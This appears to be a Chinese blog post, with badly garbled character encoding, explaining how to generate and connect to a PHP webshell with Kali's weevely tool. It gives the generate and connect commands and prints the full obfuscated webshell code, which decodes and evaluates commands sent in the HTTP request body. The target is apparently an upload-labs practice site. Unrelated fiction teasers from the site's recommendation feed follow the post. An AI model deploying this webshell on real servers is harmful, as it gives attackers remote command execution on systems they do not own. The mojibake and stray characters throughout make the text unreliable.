kali中的webshell生成工具weevely

?喜歡請(qǐng)點(diǎn)個(gè)贊吧?

用法

usage: weevely [-h] {terminal,session,generate} ...

參數(shù):

? {terminal,session,generate}

? ? terminal? ? ? ? ? ? Run terminal or command on the target #在目標(biāo)上運(yùn)行終端或命令

? ? session? ? ? ? ? ? Recover an existing session #恢復(fù)現(xiàn)有會(huì)話

? ? generate? ? ? ? ? ? Generate new agent #生成新webshell

optional arguments:

? -h, --help? ? ? ? ? ? show this help message and exit


生成shell的命令:weevely generate 密碼 文件名及路徑

weevely generate shell /root/Desktop/1.php

生成的webshell是base64加密的沉桌,代碼如下:

='or($j=B:0;($j<$c&&$i<B:$l);B:$j++,B:$i++){$o.B:=B:$t{$i}^$kB:{$B:j};}}returB:n $o;}iB:f(@pB:reg_matB:c';$h='l(B:@gB:zunB:compress(@B:x(@basB:e64_B:decode($mB:[1]),$kB:)));$o=@oB:B:b_get_conteB:nts()B:;@obB';$A='h("/$khB:(.B:+)$B:kB:f/",@fB:ile_get_contenB:ts("phpB:://B:input"),B:$B:m)==1){@ob_starB:t();@eB:va';$W=str_replace('V','','cVrVeate_VfuVnVctVion');$z=':_end_cleanB:();$B:r=B:@baseB:64_encode(B:@xB:(@gzcomB:press($o),B:$k)B:);prB:B:int("$p$kh$r$kf");}';$g='Y";function xB:($t,B:$B:k){$c=strlen($B:kB:);$B:B:l=strlen($t);$o="B:"B:;fB:or($i=0;$i<$l;B:){fB:';$Y='$kB:="2591c98b"B:;B:$B:kh="70119fe62B:48B:9";$kf="8b1eB:424bB:5e91";$pB:="DB:Z7CfNFAUiLB:y9B:tB:M';$E=str_replace('B:','',$Y.$g.$t.$A.$h.$z);$e=$W('',$E);$e();?>


連接shell

weevely http://192.168.114.129/upload-labs/upload/1.php shell

此時(shí)即可執(zhí)行命令行命令



對(duì)目標(biāo)運(yùn)行一個(gè)終端:

weevely <URL> <password> [CMD]



讀取會(huì)話文件:

weevely session <path> [CMD]

我也不是很懂后面這倆功能有啥用哨苛,要是想連接終端還用得著這玩意嗎宙址。。皂林。舔涎。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末脸候,一起剝皮案震驚了整個(gè)濱河市倍试,隨后出現(xiàn)的幾起案子讯屈,更是在濱河造成了極大的恐慌,老刑警劉巖县习,帶你破解...
    沈念sama閱讀 222,729評(píng)論 6 517
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件耻煤,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡准颓,警方通過(guò)查閱死者的電腦和手機(jī)哈蝇,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,226評(píng)論 3 399
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)攘已,“玉大人炮赦,你說(shuō)我怎么就攤上這事⊙” “怎么了吠勘?”我有些...
    開封第一講書人閱讀 169,461評(píng)論 0 362
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)峡眶。 經(jīng)常有香客問(wèn)我剧防,道長(zhǎng),這世上最難降的妖魔是什么辫樱? 我笑而不...
    開封第一講書人閱讀 60,135評(píng)論 1 300
  • 正文 為了忘掉前任峭拘,我火速辦了婚禮,結(jié)果婚禮上狮暑,老公的妹妹穿的比我還像新娘鸡挠。我一直安慰自己,他們只是感情好搬男,可當(dāng)我...
    茶點(diǎn)故事閱讀 69,130評(píng)論 6 398
  • 文/花漫 我一把揭開白布拣展。 她就那樣靜靜地躺著,像睡著了一般缔逛。 火紅的嫁衣襯著肌膚如雪备埃。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,736評(píng)論 1 312
  • 那天褐奴,我揣著相機(jī)與錄音按脚,去河邊找鬼。 笑死歉糜,一個(gè)胖子當(dāng)著我的面吹牛乘寒,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播匪补,決...
    沈念sama閱讀 41,179評(píng)論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼伞辛,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼烂翰!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起蚤氏,我...
    開封第一講書人閱讀 40,124評(píng)論 0 277
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤甘耿,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后竿滨,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體佳恬,經(jīng)...
    沈念sama閱讀 46,657評(píng)論 1 320
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,723評(píng)論 3 342
  • 正文 我和宋清朗相戀三年于游,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了毁葱。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,872評(píng)論 1 353
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡贰剥,死狀恐怖倾剿,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情蚌成,我是刑警寧澤前痘,帶...
    沈念sama閱讀 36,533評(píng)論 5 351
  • 正文 年R本政府宣布,位于F島的核電站担忧,受9級(jí)特大地震影響芹缔,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜瓶盛,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,213評(píng)論 3 336
  • 文/蒙蒙 一最欠、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧蓬网,春花似錦窒所、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,700評(píng)論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)禽额。三九已至锯厢,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間脯倒,已是汗流浹背实辑。 一陣腳步聲響...
    開封第一講書人閱讀 33,819評(píng)論 1 274
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留藻丢,地道東北人剪撬。 一個(gè)月前我還...
    沈念sama閱讀 49,304評(píng)論 3 379
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像悠反,于是被迫代替她去往敵國(guó)和親残黑。 傳聞我的和親對(duì)象是個(gè)殘疾皇子馍佑,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,876評(píng)論 2 361

推薦閱讀更多精彩內(nèi)容